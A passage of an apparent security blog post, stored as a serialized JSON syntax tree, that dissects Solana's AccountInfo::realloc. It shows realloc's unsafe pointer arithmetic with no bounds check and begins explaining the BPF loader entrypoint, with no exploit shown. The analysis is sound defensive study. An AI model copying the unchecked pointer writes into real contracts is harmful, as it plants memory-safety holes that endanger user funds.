realloc",{"type":26,"tag":137,"props":16293,"children":16294},{"style":5601},[16295],{"type":32,"value":165},{"type":26,"tag":137,"props":16297,"children":16298},{"style":5590},[16299],{"type":32,"value":5694},{"type":26,"tag":137,"props":16301,"children":16302},{"style":5573},[16303],{"type":32,"value":16304},"self",{"type":26,"tag":137,"props":16306,"children":16307},{"style":5601},[16308],{"type":32,"value":1108},{"type":26,"tag":137,"props":16310,"children":16311},{"style":5584},[16312],{"type":32,"value":16313},"new_len",{"type":26,"tag":137,"props":16315,"children":16316},{"style":5590},[16317],{"type":32,"value":7072},{"type":26,"tag":137,"props":16319,"children":16320},{"style":6009},[16321],{"type":32,"value":16322}," usize",{"type":26,"tag":137,"props":16324,"children":16325},{"style":5601},[16326],{"type":32,"value":1108},{"type":26,"tag":137,"props":16328,"children":16329},{"style":5584},[16330],{"type":32,"value":16331},"zero_init",{"type":26,"tag":137,"props":16333,"children":16334},{"style":5590},[16335],{"type":32,"value":7072},{"type":26,"tag":137,"props":16337,"children":16338},{"style":6009},[16339],{"type":32,"value":14641},{"type":26,"tag":137,"props":16341,"children":16342},{"style":5601},[16343],{"type":32,"value":5671},{"type":26,"tag":137,"props":16345,"children":16346},{"style":5590},[16347],{"type":32,"value":16348},"->",{"type":26,"tag":137,"props":16350,"children":16351},{"style":6009},[16352],{"type":32,"value":16353}," Result",{"type":26,"tag":137,"props":16355,"children":16356},{"style":5601},[16357],{"type":32,"value":16358},"\u003C(), ",{"type":26,"tag":137,"props":16360,"children":16361},{"style":6009},[16362],{"type":32,"value":16363},"ProgramError",{"type":26,"tag":137,"props":16365,"children":16366},{"style":5601},[16367],{"type":32,"value":9865},{"type":26,"tag":137,"props":16369,"children":16370},{"class":5559,"line":5412},[16371,16375,16380,16384,16389,16393,16398],{"type":26,"tag":137,"props":16372,"children":16373},{"style":5573},[16374],{"type":32,"value":5576},{"type":26,"tag":137,"props":16376,"children":16377},{"style":5584},[16378],{"type":32,"value":16379}," orig_len",{"type":26,"tag":137,"props":16381,"children":16382},{"style":5590},[16383],{"type":32,"value":5593},{"type":26,"tag":137,"props":16385,"children":16386},{"style":5573},[16387],{"type":32,"value":16388}," self",{"type":26,"tag":137,"props":16390,"children":16391},{"style":5590},[16392],{"type":32,"value":470},{"type":26,"tag":137,"props":16394,"children":16395},{"style":5682},[16396],{"type":32,"value":16397},"data_len",{"type":26,"tag":137,"props":16399,"children":16400},{"style":5601},[16401],{"type":32,"value":6267},{"type":26,"tag":137,"props":16403,"children":16404},{"class":5559,"line":5417},[16405],{"type":26,"tag":137,"props":16406,"children":16407},{"emptyLinePlaceholder":18},[16408],{"type":32,"value":6276},{"type":26,"tag":137,"props":16410,"children":16411},{"class":5559,"line":5642},[16412],{"type":26,"tag":137,"props":16413,"children":16414},{"style":5564},[16415],{"type":32,"value":16416},"    // realloc\n",{"type":26,"tag":137,"props":16418,"children":16419},{"class":5559,"line":5745},[16420,16425],{"type":26,"tag":137,"props":16421,"children":16422},{"style":5573},[16423],{"type":32,"value":16424},"    unsafe",{"type":26,"tag":137,"props":16426,"children":16427},{"style":5601},[16428],{"type":32,"value":5875},{"type":26,"tag":137,"props":16430,"children":16431},{"class":5559,"line":5850},[16432],{"type":26,"tag":137,"props":16433,"children":16434},{"style":5564},[16435],{"type":32,"value":16436},"        // First set new length in the serialized data\n",{"type":26,"tag":137,"props":16438,"children":16439},{"class":5559,"line":5878},[16440,16444,16449,16453,16457,16461,16466,16471,16475,16480,16484,16488,16493,16497,16501,16505,16509,16513,16517,16521,16525],{"type":26,"tag":137,"props":16441,"children":16442},{"style":5573},[16443],{"type":32,"value":5648},{"type":26,"tag":137,"props":16445,"children":16446},{"style":5584},[16447],{"type":32,"value":16448}," ptr",{"type":26,"tag":137,"props":16450,"children":16451},{"style":5590},[16452],{"type":32,"value":5593},{"type":26,"tag":137,"props":16454,"children":16455},{"style":5573},[16456],{"type":32,"value":16388},{"type":26,"tag":137,"props":16458,"children":16459},{"style":5590},[16460],{"type":32,"value":470},{"type":26,"tag":137,"props":16462,"children":16463},{"style":5682},[16464],{"type":32,"value":16465},"try_borrow_mut_data",{"type":26,"tag":137,"props":16467,"children":16468},{"style":5601},[16469],{"type":32,"value":16470},"()",{"type":26,"tag":137,"props":16472,"children":16473},{"style":5590},[16474],{"type":32,"value":5715},{"type":26,"tag":137,"props":16476,"children":16477},{"style":5682},[16478],{"type":32,"value":16479},"as_mut_ptr",{"type":26,"tag":137,"props":16481,"children":16482},{"style":5601},[16483],{"type":32,"value":16470},{"type":26,"tag":137,"props":16485,"children":16486},{"style":5590},[16487],{"type":32,"value":470},{"type":26,"tag":137,"props":16489,"children":16490},{"style":5682},[16491],{"type":32,"value":16492},"offset",{"type":26,"tag":137,"props":16494,"children":16495},{"style":5601},[16496],{"type":32,"value":165},{"type":26,"tag":137,"props":16498,"children":16499},{"style":5590},[16500],{"type":32,"value":6908},{"type":26,"tag":137,"props":16502,"children":16503},{"style":5626},[16504],{"type":32,"value":6663},{"type":26,"tag":137,"props":16506,"children":16507},{"style":5601},[16508],{"type":32,"value":5671},{"type":26,"tag":137,"props":16510,"children":16511},{"style":5573},[16512],{"type":32,"value":11428},{"type":26,"tag":137,"props":16514,"children":16515},{"style":5590},[16516],{"type":32,"value":12406},{"type":26,"tag":137,"props":16518,"children":16519},{"style":5573},[16520],{"type":32,"value":6325},{"type":26,"tag":137,"props":16522,"children":16523},{"style":6009},[16524],{"type":32,"value":8445},{"type":26,"tag":137,"props":16526,"children":16527},{"style":5601},[16528],{"type":32,"value":5604},{"type":26,"tag":137,"props":16530,"children":16531},{"class":5559,"line":5891},[16532,16536,16541,16545,16550,16554,16558],{"type":26,"tag":137,"props":16533,"children":16534},{"style":5590},[16535],{"type":32,"value":10336},{"type":26,"tag":137,"props":16537,"children":16538},{"style":5584},[16539],{"type":32,"value":16540},"ptr",{"type":26,"tag":137,"props":16542,"children":16543},{"style":5590},[16544],{"type":32,"value":5593},{"type":26,"tag":137,"props":16546,"children":16547},{"style":5584},[16548],{"type":32,"value":16549}," new_len",{"type":26,"tag":137,"props":16551,"children":16552},{"style":5573},[16553],{"type":32,"value":11414},{"type":26,"tag":137,"props":16555,"children":16556},{"style":6009},[16557],{"type":32,"value":8445},{"type":26,"tag":137,"props":16559,"children":16560},{"style":5601},[16561],{"type":32,"value":5604},{"type":26,"tag":137,"props":16563,"children":16564},{"class":5559,"line":5909},[16565],{"type":26,"tag":137,"props":16566,"children":16567},{"emptyLinePlaceholder":18},[16568],{"type":32,"value":6276},{"type":26,"tag":137,"props":16570,"children":16571},{"class":5559,"line":5930},[16572],{"type":26,"tag":137,"props":16573,"children":16574},{"style":5564},[16575],{"type":32,"value":16576},"        // Then set the new length in the local slice\n",{"type":26,"tag":137,"props":16578,"children":16579},{"class":5559,"line":5939},[16580,16584,16588,16592,16596,16600,16604,16609,16613,16617,16621,16625,16630,16635,16639,16643,16647,16651,16655,16659,16663,16667,16671,16675,16679,16683,16687,16691,16695,16699,16703],{"type":26,"tag":137,"props":16581,"children":16582},{"style":5573},[16583],{"type":32,"value":5648},{"type":26,"tag":137,"props":16585,"children":16586},{"style":5584},[16587],{"type":32,"value":16448},{"type":26,"tag":137,"props":16589,"children":16590},{"style":5590},[16591],{"type":32,"value":5593},{"type":26,"tag":137,"props":16593,"children":16594},{"style":5590},[16595],{"type":32,"value":9725},{"type":26,"tag":137,"props":16597,"children":16598},{"style":5573},[16599],{"type":32,"value":6325},{"type":26,"tag":137,"props":16601,"children":16602},{"style":5590},[16603],{"type":32,"value":12406},{"type":26,"tag":137,"props":16605,"children":16606},{"style":5601},[16607],{"type":32,"value":16608},"(((",{"type":26,"tag":137,"props":16610,"children":16611},{"style":5573},[16612],{"type":32,"value":16304},{"type":26,"tag":137,"props":16614,"children":16615},{"style":5590},[16616],{"type":32,"value":470},{"type":26,"tag":137,"props":16618,"children":16619},{"style":5601},[16620],{"type":32,"value":6303},{"type":26,"tag":137,"props":16622,"children":16623},{"style":5590},[16624],{"type":32,"value":470},{"type":26,"tag":137,"props":16626,"children":16627},{"style":5682},[16628],{"type":32,"value":16629},"as_ptr",{"type":26,"tag":137,"props":16631,"children":16632},{"style":5601},[16633],{"type":32,"value":16634},"() ",{"type":26,"tag":137,"props":16636,"children":16637},{"style":5573},[16638],{"type":32,"value":11428},{"type":26,"tag":137,"props":16640,"children":16641},{"style":5590},[16642],{"type":32,"value":12406},{"type":26,"tag":137,"props":16644,"children":16645},{"style":5573},[16646],{"type":32,"value":12244},{"type":26,"tag":137,"props":16648,"children":16649},{"style":6009},[16650],{"type":32,"value":8445},{"type":26,"tag":137,"props":16652,"children":16653},{"style":5601},[16654],{"type":32,"value":200},{"type":26,"tag":137,"props":16656,"children":16657},{"style":5590},[16658],{"type":32,"value":470},{"type":26,"tag":137,"props":16660,"children":16661},{"style":5682},[16662],{"type":32,"value":16492},{"type":26,"tag":137,"props":16664,"children":16665},{"style":5601},[16666],{"type":32,"value":165},{"type":26,"tag":137,"props":16668,"children":16669},{"style":5626},[16670],{"type":32,"value":878},{"type":26,"tag":137,"props":16672,"children":16673},{"style":5601},[16674],{"type":32,"value":5671},{"type":26,"tag":137,"props":16676,"children":16677},{"style":5573},[16678],{"type":32,"value":11428},{"type":26,"tag":137,"props":16680,"children":16681},{"style":6009},[16682],{"type":32,"value":8445},{"type":26,"tag":137,"props":16684,"children":16685},{"style":5601},[16686],{"type":32,"value":5671},{"type":26,"tag":137,"props":16688,"children":16689},{"style":5573},[16690],{"type":32,"value":11428},{"type":26,"tag":137,"props":16692,"children":16693},{"style":5590},[16694],{"type":32,"value":12406},{"type":26,"tag":137,"props":16696,"children":16697},{"style":5573},[16698],{"type":32,"value":6325},{"type":26,"tag":137,"props":16700,"children":16701},{"style":6009},[16702],{"type":32,"value":8445},{"type":26,"tag":137,"props":16704,"children":16705},{"style":5601},[16706],{"type":32,"value":6430},{"type":26,"tag":137,"props":16708,"children":16709},{"class":5559,"line":6191},[16710,16714,16718,16722,16726,16730,16734],{"type":26,"tag":137,"props":16711,"children":16712},{"style":5590},[16713],{"type":32,"value":10336},{"type":26,"tag":137,"props":16715,"children":16716},{"style":5584},[16717],{"type":32,"value":16540},{"type":26,"tag":137,"props":16719,"children":16720},{"style":5590},[16721],{"type":32,"value":5593},{"type":26,"tag":137,"props":16723,"children":16724},{"style":5584},[16725],{"type":32,"value":16549},{"type":26,"tag":137,"props":16727,"children":16728},{"style":5573},[16729],{"type":32,"value":11414},{"type":26,"tag":137,"props":16731,"children":16732},{"style":6009},[16733],{"type":32,"value":8445},{"type":26,"tag":137,"props":16735,"children":16736},{"style":5601},[16737],{"type":32,"value":5604},{"type":26,"tag":137,"props":16739,"children":16740},{"class":5559,"line":6208},[16741],{"type":26,"tag":137,"props":16742,"children":16743},{"style":5601},[16744],{"type":32,"value":5945},{"type":26,"tag":137,"props":16746,"children":16747},{"class":5559,"line":6225},[16748],{"type":26,"tag":137,"props":16749,"children":16750},{"emptyLinePlaceholder":18},[16751],{"type":32,"value":6276},{"type":26,"tag":137,"props":16753,"children":16754},{"class":5559,"line":6238},[16755],{"type":26,"tag":137,"props":16756,"children":16757},{"style":5564},[16758],{"type":32,"value":16759},"    // zero-init if requested\n",{"type":26,"tag":137,"props":16761,"children":16762},{"class":5559,"line":6247},[16763,16767,16772,16777,16781,16786,16790],{"type":26,"tag":137,"props":16764,"children":16765},{"style":5610},[16766],{"type":32,"value":14870},{"type":26,"tag":137,"props":16768,"children":16769},{"style":5584},[16770],{"type":32,"value":16771}," zero_init",{"type":26,"tag":137,"props":16773,"children":16774},{"style":5590},[16775],{"type":32,"value":16776}," &&",{"type":26,"tag":137,"props":16778,"children":16779},{"style":5584},[16780],{"type":32,"value":16549},{"type":26,"tag":137,"props":16782,"children":16783},{"style":5590},[16784],{"type":32,"value":16785}," >",{"type":26,"tag":137,"props":16787,"children":16788},{"style":5584},[16789],{"type":32,"value":16379},{"type":26,"tag":137,"props":16791,"children":16792},{"style":5601},[16793],{"type":32,"value":5875},{"type":26,"tag":137,"props":16795,"children":16796},{"class":5559,"line":6270},[16797,16802],{"type":26,"tag":137,"props":16798,"children":16799},{"style":5682},[16800],{"type":32,"value":16801},"        sol_memset",{"type":26,"tag":137,"props":16803,"children":16804},{"style":5601},[16805],{"type":32,"value":6054},{"type":26,"tag":137,"props":16807,"children":16808},{"class":5559,"line":6279},[16809,16813,16817,16821,16825,16829,16833,16837,16841,16846,16850],{"type":26,"tag":137,"props":16810,"children":16811},{"style":5590},[16812],{"type":32,"value":10269},{"type":26,"tag":137,"props":16814,"children":16815},{"style":5573},[16816],{"type":32,"value":6325},{"type":26,"tag":137,"props":16818,"children":16819},{"style":5573},[16820],{"type":32,"value":16388},{"type":26,"tag":137,"props":16822,"children":16823},{"style":5590},[16824],{"type":32,"value":470},{"type":26,"tag":137,"props":16826,"children":16827},{"style":5682},[16828],{"type":32,"value":16465},{"type":26,"tag":137,"props":16830,"children":16831},{"style":5601},[16832],{"type":32,"value":16470},{"type":26,"tag":137,"props":16834,"children":16835},{"style":5590},[16836],{"type":32,"value":5737},{"type":26,"tag":137,"props":16838,"children":16839},{"style":5601},[16840],{"type":32,"value":3016},{"type":26,"tag":137,"props":16842,"children":16843},{"style":5584},[16844],{"type":32,"value":16845},"orig_len",{"type":26,"tag":137,"props":16847,"children":16848},{"style":5590},[16849],{"type":32,"value":5634},{"type":26,"tag":137,"props":16851,"children":16852},{"style":5601},[16853],{"type":32,"value":16854},"],\n",{"type":26,"tag":137,"props":16856,"children":16857},{"class":5559,"line":6288},[16858,16863],{"type":26,"tag":137,"props":16859,"children":16860},{"style":5626},[16861],{"type":32,"value":16862},"            0",{"type":26,"tag":137,"props":16864,"children":16865},{"style":5601},[16866],{"type":32,"value":6099},{"type":26,"tag":137,"props":16868,"children":16869},{"class":5559,"line":6355},[16870,16875,16879,16884,16888,16892],{"type":26,"tag":137,"props":16871,"children":16872},{"style":5584},[16873],{"type":32,"value":16874},"            new_len",{"type":26,"tag":137,"props":16876,"children":16877},{"style":5590},[16878],{"type":32,"value":470},{"type":26,"tag":137,"props":16880,"children":16881},{"style":5682},[16882],{"type":32,"value":16883},"saturating_sub",{"type":26,"tag":137,"props":16885,"children":16886},{"style":5601},[16887],{"type":32,"value":165},{"type":26,"tag":137,"props":16889,"children":16890},{"style":5584},[16891],{"type":32,"value":16845},{"type":26,"tag":137,"props":16893,"children":16894},{"style":5601},[16895],{"type":32,"value":9320},{"type":26,"tag":137,"props":16897,"children":16898},{"class":5559,"line":6363},[16899],{"type":26,"tag":137,"props":16900,"children":16901},{"style":5601},[16902],{"type":32,"value":10328},{"type":26,"tag":137,"props":16904,"children":16905},{"class":5559,"line":6393},[16906],{"type":26,"tag":137,"props":16907,"children":16908},{"style":5601},[16909],{"type":32,"value":5945},{"type":26,"tag":137,"props":16911,"children":16912},{"class":5559,"line":6401},[16913],{"type":26,"tag":137,"props":16914,"children":16915},{"emptyLinePlaceholder":18},[16916],{"type":32,"value":6276},{"type":26,"tag":137,"props":16918,"children":16919},{"class":5559,"line":6433},[16920,16925],{"type":26,"tag":137,"props":16921,"children":16922},{"style":6009},[16923],{"type":32,"value":16924},"    Ok",{"type":26,"tag":137,"props":16926,"children":16927},{"style":5601},[16928],{"type":32,"value":16929},"(())\n",{"type":26,"tag":137,"props":16931,"children":16932},{"class":5559,"line":6441},[16933],{"type":26,"tag":137,"props":16934,"children":16935},{"style":5601},[16936],{"type":32,"value":6507},{"type":26,"tag":35,"props":16938,"children":16939},{},[16940,16942,16948,16950,16955],{"type":32,"value":16941},"Oh. There's ",{"type":26,"tag":130,"props":16943,"children":16945},{"className":16944},[],[16946],{"type":32,"value":16947},"unsafe",{"type":32,"value":16949},". And no bounds check in sight. ",{"type":26,"tag":762,"props":16951,"children":16952},{},[16953],{"type":32,"value":16954},"And",{"type":32,"value":16956}," pointer math. That doesn't look promising...",{"type":26,"tag":92,"props":16958,"children":16960},{"id":16959},"breaking-down-realloc",[16961,16963],{"type":32,"value":16962},"Breaking down ",{"type":26,"tag":130,"props":16964,"children":16966},{"className":16965},[],[16967],{"type":32,"value":16229},{"type":26,"tag":35,"props":16969,"children":16970},{},[16971,16973,16978],{"type":32,"value":16972},"Let's pick apart this ",{"type":26,"tag":130,"props":16974,"children":16976},{"className":16975},[],[16977],{"type":32,"value":16947},{"type":32,"value":16979}," block, since there's a lot going on here.",{"type":26,"tag":5512,"props":16981,"children":16983},{"className":5552,"code":16982,"language":5551,"meta":7,"style":7},"// First set new length in the serialized data\nlet ptr = self.try_borrow_mut_data()?.as_mut_ptr().offset(-8) as *mut u64;\n*ptr = new_len as u64;\n",[16984],{"type":26,"tag":130,"props":16985,"children":16986},{"__ignoreMap":7},[16987,16995,17082],{"type":26,"tag":137,"props":16988,"children":16989},{"class":5559,"line":5560},[16990],{"type":26,"tag":137,"props":16991,"children":16992},{"style":5564},[16993],{"type":32,"value":16994},"// First set new length in the serialized data\n",{"type":26,"tag":137,"props":16996,"children":16997},{"class":5559,"line":5412},[16998,17002,17006,17010,17014,17018,17022,17026,17030,17034,17038,17042,17046,17050,17054,17058,17062,17066,17070,17074,17078],{"type":26,"tag":137,"props":16999,"children":17000},{"style":5573},[17001],{"type":32,"value":14378},{"type":26,"tag":137,"props":17003,"children":17004},{"style":5584},[17005],{"type":32,"value":16448},{"type":26,"tag":137,"props":17007,"children":17008},{"style":5590},[17009],{"type":32,"value":5593},{"type":26,"tag":137,"props":17011,"children":17012},{"style":5573},[17013],{"type":32,"value":16388},{"type":26,"tag":137,"props":17015,"children":17016},{"style":5590},[17017],{"type":32,"value":470},{"type":26,"tag":137,"props":17019,"children":17020},{"style":5682},[17021],{"type":32,"value":16465},{"type":26,"tag":137,"props":17023,"children":17024},{"style":5601},[17025],{"type":32,"value":16470},{"type":26,"tag":137,"props":17027,"children":17028},{"style":5590},[17029],{"type":32,"value":5715},{"type":26,"tag":137,"props":17031,"children":17032},{"style":5682},[17033],{"type":32,"value":16479},{"type":26,"tag":137,"props":17035,"children":17036},{"style":5601},[17037],{"type":32,"value":16470},{"type":26,"tag":137,"props":17039,"children":17040},{"style":5590},[17041],{"type":32,"value":470},{"type":26,"tag":137,"props":17043,"children":17044},{"style":5682},[17045],{"type":32,"value":16492},{"type":26,"tag":137,"props":17047,"children":17048},{"style":5601},[17049],{"type":32,"value":165},{"type":26,"tag":137,"props":17051,"children":17052},{"style":5590},[17053],{"type":32,"value":6908},{"type":26,"tag":137,"props":17055,"children":17056},{"style":5626},[17057],{"type":32,"value":6663},{"type":26,"tag":137,"props":17059,"children":17060},{"style":5601},[17061],{"type":32,"value":5671},{"type":26,"tag":137,"props":17063,"children":17064},{"style":5573},[17065],{"type":32,"value":11428},{"type":26,"tag":137,"props":17067,"children":17068},{"style":5590},[17069],{"type":32,"value":12406},{"type":26,"tag":137,"props":17071,"children":17072},{"style":5573},[17073],{"type":32,"value":6325},{"type":26,"tag":137,"props":17075,"children":17076},{"style":6009},[17077],{"type":32,"value":8445},{"type":26,"tag":137,"props":17079,"children":17080},{"style":5601},[17081],{"type":32,"value":5604},{"type":26,"tag":137,"props":17083,"children":17084},{"class":5559,"line":5417},[17085,17089,17093,17097,17101,17105,17109],{"type":26,"tag":137,"props":17086,"children":17087},{"style":5590},[17088],{"type":32,"value":7152},{"type":26,"tag":137,"props":17090,"children":17091},{"style":5584},[17092],{"type":32,"value":16540},{"type":26,"tag":137,"props":17094,"children":17095},{"style":5590},[17096],{"type":32,"value":5593},{"type":26,"tag":137,"props":17098,"children":17099},{"style":5584},[17100],{"type":32,"value":16549},{"type":26,"tag":137,"props":17102,"children":17103},{"style":5573},[17104],{"type":32,"value":11414},{"type":26,"tag":137,"props":17106,"children":17107},{"style":6009},[17108],{"type":32,"value":8445},{"type":26,"tag":137,"props":17110,"children":17111},{"style":5601},[17112],{"type":32,"value":5604},{"type":26,"tag":35,"props":17114,"children":17115},{},[17116,17121],{"type":26,"tag":130,"props":17117,"children":17119},{"className":17118},[],[17120],{"type":32,"value":16465},{"type":32,"value":17122}," returns a mutable reference to the underlying buffer holding the data of the account. Normally in the course of contract execution, this comes from the serialized buffer passed into the contract by the BPF loader. So before we can understand the details here, let's take a quick detour...",{"type":26,"tag":118,"props":17124,"children":17126},{"id":17125},"bpf-loader-abi",[17127],{"type":32,"value":17128},"BPF Loader ABI",{"type":26,"tag":35,"props":17130,"children":17131},{},[17132,17134,17139,17141,17154],{"type":32,"value":17133},"Solana smart contracts have one job: interact with on-chain accounts. So what's the interface between the contract and the rest of the chain? To answer that, we're going to take a look at ",{"type":26,"tag":130,"props":17135,"children":17137},{"className":17136},[],[17138],{"type":32,"value":16244},{"type":32,"value":17140},"'s entrypoint code - the code that's added when you use the ",{"type":26,"tag":41,"props":17142,"children":17145},{"href":17143,"rel":17144},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#116-131",[45],[17146,17152],{"type":26,"tag":130,"props":17147,"children":17149},{"className":17148},[],[17150],{"type":32,"value":17151},"entrypoint!",{"type":32,"value":17153}," macro",{"type":32,"value":7072},{"type":26,"tag":5512,"props":17156,"children":17158},{"className":5552,"code":17157,"language":5551,"meta":7,"style":7},"#[no_mangle]\npub unsafe extern \"C\" fn entrypoint(input: *mut u8) -> u64 {\n    let (program_id, accounts, instruction_data) =\n        unsafe { $crate::entrypoint::deserialize(input) };\n    match $process_instruction(&program_id, &accounts, &instruction_data) {\n        Ok(()) => $crate::entrypoint::SUCCESS,\n        Err(error) => error.into(),\n    }\n}\n",[17159],{"type":26,"tag":130,"props":17160,"children":17161},{"__ignoreMap":7},[17162,17170,17242,17285,17337,17396,17439,17482,17489],{"type":26,"tag":137,"props":17163,"children":17164},{"class":5559,"line":5560},[17165],{"type":26,"tag":137,"props":17166,"children":17167},{"style":5601},[17168],{"type":32,"value":17169},"#[no_mangle]\n",{"type":26,"tag":137,"props":17171,"children":17172},{"class":5559,"line":5412},[17173,17177,17182,17187,17192,17196,17201,17205,17209,17213,17217,17221,17226,17230,17234,17238],{"type":26,"tag":137,"props":17174,"children":17175},{"style":5573},[17176],{"type":32,"value":16281},{"type":26,"tag":137,"props":17178,"children":17179},{"style":5573},[17180],{"type":32,"value":17181}," unsafe",{"type":26,"tag":137,"props":17183,"children":17184},{"style":5573},[17185],{"type":32,"value":17186}," extern",{"type":26,"tag":137,"props":17188,"children":17189},{"style":6837},[17190],{"type":32,"value":17191}," \"C\"",{"type":26,"tag":137,"props":17193,"children":17194},{"style":5573},[17195],{"type":32,"value":16286},{"type":26,"tag":137,"props":17197,"children":17198},{"style":5682},[17199],{"type":32,"value":17200}," entrypoint",{"type":26,"tag":137,"props":17202,"children":17203},{"style":5601},[17204],{"type":32,"value":165},{"type":26,"tag":137,"props":17206,"children":17207},{"style":5584},[17208],{"type":32,"value":10952},{"type":26,"tag":137,"props":17210,"children":17211},{"style":5590},[17212],{"type":32,"value":7072},{"type":26,"tag":137,"props":17214,"children":17215},{"style":5590},[17216],{"type":32,"value":12406},{"type":26,"tag":137,"props":17218,"children":17219},{"style":5573},[17220],{"type":32,"value":6325},{"type":26,"tag":137,"props":17222,"children":17223},{"style":6009},[17224],{"type":32,"value":17225}," u8",{"type":26,"tag":137,"props":17227,"children":17228},{"style":5601},[17229],{"type":32,"value":5671},{"type":26,"tag":137,"props":17231,"children":17232},{"style":5590},[17233],{"type":32,"value":16348},{"type":26,"tag":137,"props":17235,"children":17236},{"style":6009},[17237],{"type":32,"value":8445},{"type":26,"tag":137,"props":17239,"children":17240},{"style":5601},[17241],{"type":32,"value":5875},{"type":26,"tag":137,"props":17243,"children":17244},{"class":5559,"line":5417},[17245,17249,17253,17258,17262,17267,17271,17276,17280],{"type":26,"tag":137,"props":17246,"children":17247},{"style":5573},[17248],{"type":32,"value":5576},{"type":26,"tag":137,"props":17250,"children":17251},{"style":5601},[17252],{"type":32,"value":4625},{"type":26,"tag":137,"props":17254,"children":17255},{"style":5584},[17256],{"type":32,"value":17257},"program_id",{"type":26,"tag":137,"props":17259,"children":17260},{"style":5601},[17261],{"type":32,"value":1108},{"type":26,"tag":137,"props":17263,"children":17264},{"style":5584},[17265],{"type":32,"value":17266},"accounts",{"type":26,"tag":137,"props":17268,"children":17269},{"style":5601},[17270],{"type":32,"value":1108},{"type":26,"tag":137,"props":17272,"children":17273},{"style":5584},[17274],{"type":32,"value":17275},"instruction_data",{"type":26,"tag":137,"props":17277,"children":17278},{"style":5601},[17279],{"type":32,"value":5671},{"type":26,"tag":137,"props":17281,"children":17282},{"style":5590},[17283],{"type":32,"value":17284},"=\n",{"type":26,"tag":137,"props":17286,"children":17287},{"class":5559,"line":5642},[17288,17293,17297,17301,17306,17310,17315,17319,17324,17328,17332],{"type":26,"tag":137,"props":17289,"children":17290},{"style":5573},[17291],{"type":32,"value":17292},"        unsafe",{"type":26,"tag":137,"props":17294,"children":17295},{"style":5601},[17296],{"type":32,"value":12175},{"type":26,"tag":137,"props":17298,"children":17299},{"style":5590},[17300],{"type":32,"value":12878},{"type":26,"tag":137,"props":17302,"children":17303},{"style":5573},[17304],{"type":32,"value":17305},"crate",{"type":26,"tag":137,"props":17307,"children":17308},{"style":5590},[17309],{"type":32,"value":6072},{"type":26,"tag":137,"props":17311,"children":17312},{"style":5601},[17313],{"type":32,"value":17314},"entrypoint",{"type":26,"tag":137,"props":17316,"children":17317},{"style":5590},[17318],{"type":32,"value":6072},{"type":26,"tag":137,"props":17320,"children":17321},{"style":5682},[17322],{"type":32,"value":17323},"deserialize",{"type":26,"tag":137,"props":17325,"children":17326},{"style":5601},[17327],{"type":32,"value":165},{"type":26,"tag":137,"props":17329,"children":17330},{"style":5584},[17331],{"type":32,"value":10952},{"type":26,"tag":137,"props":17333,"children":17334},{"style":5601},[17335],{"type":32,"value":17336},") };\n",{"type":26,"tag":137,"props":17338,"children":17339},{"class":5559,"line":5745},[17340,17345,17350,17355,17359,17363,17367,17371,17375,17379,17383,17387,17391],{"type":26,"tag":137,"props":17341,"children":17342},{"style":5610},[17343],{"type":32,"value":17344},"    match",{"type":26,"tag":137,"props":17346,"children":17347},{"style":5590},[17348],{"type":32,"value":17349}," $",{"type":26,"tag":137,"props":17351,"children":17352},{"style":5584},[17353],{"type":32,"value":17354},"process_instruction",{"type":26,"tag":137,"props":17356,"children":17357},{"style":5601},[17358],{"type":32,"value":165},{"type":26,"tag":137,"props":17360,"children":17361},{"style":5590},[17362],{"type":32,"value":5694},{"type":26,"tag":137,"props":17364,"children":17365},{"style":5584},[17366],{"type":32,"value":17257},{"type":26,"tag":137,"props":17368,"children":17369},{"style":5601},[17370],{"type":32,"value":1108},{"type":26,"tag":137,"props":17372,"children":17373},{"style":5590},[17374],{"type":32,"value":5694},{"type":26,"tag":137,"props":17376,"children":17377},{"style":5584},[17378],{"type":32,"value":17266},{"type":26,"tag":137,"props":17380,"children":17381},{"style":5601},[17382],{"type":32,"value":1108},{"type":26,"tag":137,"props":17384,"children":17385},{"style":5590},[17386],{"type":32,"value":5694},{"type":26,"tag":137,"props":17388,"children":17389},{"style":5584},[17390],{"type":32,"value":17275},{"type":26,"tag":137,"props":17392,"children":17393},{"style":5601},[17394],{"type":32,"value":17395},") {\n",{"type":26,"tag":137,"props":17397,"children":17398},{"class":5559,"line":5850},[17399,17404,17409,17414,17418,17422,17426,17430,17434],{"type":26,"tag":137,"props":17400,"children":17401},{"style":6009},[17402],{"type":32,"value":17403},"        Ok",{"type":26,"tag":137,"props":17405,"children":17406},{"style":5601},[17407],{"type":32,"value":17408},"(()) ",{"type":26,"tag":137,"props":17410,"children":17411},{"style":5590},[17412],{"type":32,"value":17413},"=>",{"type":26,"tag":137,"props":17415,"children":17416},{"style":5590},[17417],{"type":32,"value":17349},{"type":26,"tag":137,"props":17419,"children":17420},{"style":5573},[17421],{"type":32,"value":17305},{"type":26,"tag":137,"props":17423,"children":17424},{"style":5590},[17425],{"type":32,"value":6072},{"type":26,"tag":137,"props":17427,"children":17428},{"style":5601},[17429],{"type":32,"value":17314},{"type":26,"tag":137,"props":17431,"children":17432},{"style":5590},[17433],{"type":32,"value":6072},{"type":26,"tag":137,"props":17435,"children":17436},{"style":5601},[17437],{"type":32,"value":17438},"SUCCESS,\n",{"type":26,"tag":137,"props":17440,"children":17441},{"class":5559,"line":5878},[17442,17447,17451,17456,17460,17464,17469,17473,17478],{"type":26,"tag":137,"props":17443,"children":17444},{"style":6009},[17445],{"type":32,"value":17446},"        Err",{"type":26,"tag":137,"props":17448,"children":17449},{"style":5601},[17450],{"type":32,"value":165},{"type":26,"tag":137,"props":17452,"children":17453},{"style":5584},[17454],{"type":32,"value":17455},"error",{"type":26,"tag":137,"props":17457,"children":17458},{"style":5601},[17459],{"type":32,"value":5671},{"type":26,"tag":137,"props":17461,"children":17462},{"style":5590},[17463],{"type":32,"value":17413},{"type":26,"tag":137,"props":17465,"children":17466},{"style":5584},[17467],{"type":32,"value":17468}," 